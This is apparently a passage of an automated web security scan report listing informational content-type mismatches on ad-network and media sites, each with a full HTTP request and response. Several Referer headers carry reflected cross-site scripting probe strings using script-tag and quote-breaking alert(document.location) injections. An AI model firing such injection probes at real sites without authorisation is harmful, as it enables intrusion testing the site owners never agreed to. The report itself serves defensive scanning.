Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:12 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1
Content-Type: text/html

;

17.6. http://amch.questionmarket.com/adscgen/st.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=918795&site=65685687&code=43061174&randnum=4026444 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:55 GMT
Server: Apache/2.2.14 (Ubuntu)
DL_S: a201
Vary: Accept-Encoding
Content-Length: 1577
Content-Type: text/html; charset=utf-8

(function() {
var rp=parseFloat("100"),r=Math.random()*10000,s_id="DL_918795_8_43061174",d=document,w=window;

var swid = "";
if ('' != "") {
   var tags = document.getElementsByTagN
...[SNIP]...

17.7. http://amch.questionmarket.com/adscgen/sta.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adscgen/sta.php?survey_num=879999&site=1223610&code=1509596&ut_sys=pointroll HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:13 GMT
Server: Apache/2.2.14 (Ubuntu)
DL_S: a206
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8

;

17.8. http://bin.clearspring.com/at/v/1/button1.6.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bin.clearspring.com
Path:   /at/v/1/button1.6.swf

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /at/v/1/button1.6.swf HTTP/1.1
Host: bin.clearspring.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Cache-Control: max-age=86313600
Date: Mon, 12 Sep 2011 12:48:08 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding

File not found.

17.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2685991&PluID=0&w=336&h=150&ord=1837674&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/p%3B241151714%3B0-0%3B0%3B42089989%3B18754-336/150%3B42232212/42249999/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 12 Sep 2011 12:48:05 GMT
Connection: close
Content-Length: 2070

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

17.10. http://class.savannahnow.com/classifieds-bin/classifieds

Summary

Severity:   Information
Confidence:   Firm
Host:   http://class.savannahnow.com
Path:   /classifieds-bin/classifieds

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html; charset=ISO-8859-1
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /classifieds-bin/classifieds?tp=mdTopAds2.0+Core&category=core&temp_type=browse&prop=savannah%20topads&class=Real%20Estate%20for%20Sale&targetdiv=wl-top-2&perPage=3&showViewAll=True&highlightMax=&maxChars=50 HTTP/1.1
Host: class.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:32:50 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: Last-Modified: Mon, 12 Sep 2011 12:32:00 GMT
Cache-Control: Expires: Mon, 12 Sep 2011 12:42:00 GMT
Content-Length: 527
Age: 928
X-Cache: HIT from classapp2.morris.com
X-Cache-Lookup: HIT from classapp2.morris.com:3128
Connection: keep-alive


var target = document.getElementById('wl-top-2');


       target.innerHTML = " ";
       target.innerHTML='No Ads Found<div id="mdw_viewall"><a href="http://class.savannahnow.com/classifieds-bin/classi
...[SNIP]...

17.11. http://drupal.org/misc/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drupal.org
Path:   /misc/favicon.ico

Issue detail

The response contains the following Content-type statement:
Content-Type: text/plain; charset=utf-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /misc/favicon.ico HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.2.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 18 Feb 2009 20:49:42 GMT
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 12:44:30 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Length: 5430
Date: Mon, 12 Sep 2011 12:47:02 GMT
X-Varnish: 550018730 550007800
Age: 153
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www6.drupal.org
X-Cache: HIT
X-Cache-Hits: 69

...[SNIP]...

17.12. http://go.savannahnow.com/partner_json/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The response contains the following Content-type statement:
Content-Type: text/plain; charset=utf-8
The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: fresh
X-HTTP_CLIENT_IP_O: 108.39.3.168
ETag: "86c64c0eefa9ee193ae95b138e3b013d"
X-Runtime: 157
Access-Control-Allow-Origin: *
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 274544672133f3873d83689b5066ec621d4e5366
Cache-Control: max-age=1800, public
Z-REQUEST-HANDLED-BY: www12
Age: 1089
Content-Length: 2841

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011"
...[SNIP]...

17.13. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...

17.14. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intl.esperanto.mtvi.com
Path:   /sitewide/scripts/widgets/geo/geoload.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /sitewide/scripts/widgets/geo/geoload.jhtml?load=advisory&profile=mtv_co_uk HTTP/1.1
Host: intl.esperanto.mtvi.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html;charset=UTF-8
ETag: 275c2131eb4e1b98c2a8cae0743c81
Vary: Accept-Encoding
Cache-Control: max-age=21351
Date: Mon, 12 Sep 2011 12:48:44 GMT
Content-Length: 5044
Connection: close

try {
if (!mtvni) var mtvni = {};
if (!mtvni.geo) {
mtvni.geo = {};
mtvni.geo.init = {};
mtvni.geo.info = { profile: {}, imagefolder: "/gsp", verno: "2.5", initLoaded: false }
try {
mtvni.geo.info.scr
...[SNIP]...

17.15. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/advisory.jhtml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intl.esperanto.mtvi.com
Path:   /sitewide/scripts/widgets/geo/json/advisory.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sitewide/scripts/widgets/geo/json/advisory.jhtml?profile=mtv_co_uk&geocode=us&verno=2.5 HTTP/1.1
Host: intl.esperanto.mtvi.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: e8546aea70703484da532a8b7ea03740
Last-Modified: Mon, 12 Sep 2011 12:42:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1070
Cache-Control: max-age=21513
Date: Mon, 12 Sep 2011 12:49:58 GMT
Connection: close
Vary: Accept-Encoding

mtvni.geo.info.advisoryjson = {
width:'768',
height:'450',
imgpath: 'http://intl.esperanto.mtvi.com',
geo: 'us',
profile: 'mtv_co_uk',
json: { geomanagementprofile:{ title:'Continue to visit MTV UK',    
...[SNIP]...

17.16. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/persistent.jhtml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intl.esperanto.mtvi.com
Path:   /sitewide/scripts/widgets/geo/json/persistent.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sitewide/scripts/widgets/geo/json/persistent.jhtml?profile=mtv_co_uk_persistent&geocode=us&verno=2.5 HTTP/1.1
Host: intl.esperanto.mtvi.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 6b27bef8fecbad8578708298af758d1d
Last-Modified: Mon, 12 Sep 2011 12:46:56 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 871
Cache-Control: max-age=21471
Date: Mon, 12 Sep 2011 12:49:57 GMT
Connection: close
Vary: Accept-Encoding

mtvni.geo.info.persistentjson = {
width:'768',
height:'450',
imgpath: 'http://intl.esperanto.mtvi.com',
geo: 'us',
profile: 'mtv_co_uk_persistent',
json: { geomanagementprofile:{ title:'Continue to vi
...[SNIP]...

17.17. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metrics.impactengine.com
Path:   /rest/reveal/129534/5011/Expand_Content

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /rest/reveal/129534/5011/Expand_Content?invalidate=1315849766118 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:17 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 63
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><reveal>    <success id='129534' /></reveal></rsp>

17.18. http://metrics.impactengine.com/rest/view/129534/5011/0

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/0

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /rest/view/129534/5011/0?invalidate=1315849757167 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:02 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 69
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534' /></mouse_over</rsp>

17.19. http://metrics.impactengine.com/rest/view/129534/5011/30

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/30

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /rest/view/129534/5011/30?invalidate=1315849817169 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:06:38 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 69
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534' /></mouse_over</rsp>

17.20. http://p.raasnet.com/partners/dfp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';

17.21. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /148250/91bc34b96eac101805574950b6644cc6

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /148250/91bc34b96eac101805574950b6644cc6?callback=BF_PARTNER.gate_response&cb=1793 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=604755
Expires: Mon, 19 Sep 2011 12:47:13 GMT
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close

BF_PARTNER.gate_response(1304470645);

17.22. http://ps2.newsinc.com/Playlist/show/10557/4106/994.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ps2.newsinc.com
Path:   /Playlist/show/10557/4106/994.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /Playlist/show/10557/4106/994.xml HTTP/1.1
Host: ps2.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 12 Sep 2011 12:49:50 GMT
Expires: -1
NDN-Server: PS05
NDN-SiteVer: 3.2.1
Pragma: no-cache
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 2.0
X-Powered-By: ASP.NET
Content-Length: 4598
Connection: keep-alive


<?xml version="1.0" encoding="UTF-8"?>
<ServiceResponse xmlns="http://permissiontv.com/v2.2/ptvml">
   <Status>200</Status>
   <Message>Success.</Message>
   
<Playlist>
<ID>994</ID>
<Nam
...[SNIP]...

17.23. http://s0.2mdn.net/2251996/Pixel_1x1.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s0.2mdn.net
Path:   /2251996/Pixel_1x1.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /2251996/Pixel_1x1.jpg HTTP/1.1
Host: s0.2mdn.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Tue, 07 Apr 2009 10:56:12 GMT
Date: Mon, 12 Sep 2011 12:48:58 GMT
Expires: Tue, 13 Sep 2011 12:48:58 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

17.24. http://www.cargoh.com/sites/all/themes/cargoh/images/icons/fav_mail.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargoh.com
Path:   /sites/all/themes/cargoh/images/icons/fav_mail.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /sites/all/themes/cargoh/images/icons/fav_mail.gif HTTP/1.1
Host: www.cargoh.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 06 Apr 2011 20:21:49 GMT
ETag: "12a8219-539-4a045be13d140"
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 10:58:49 GMT
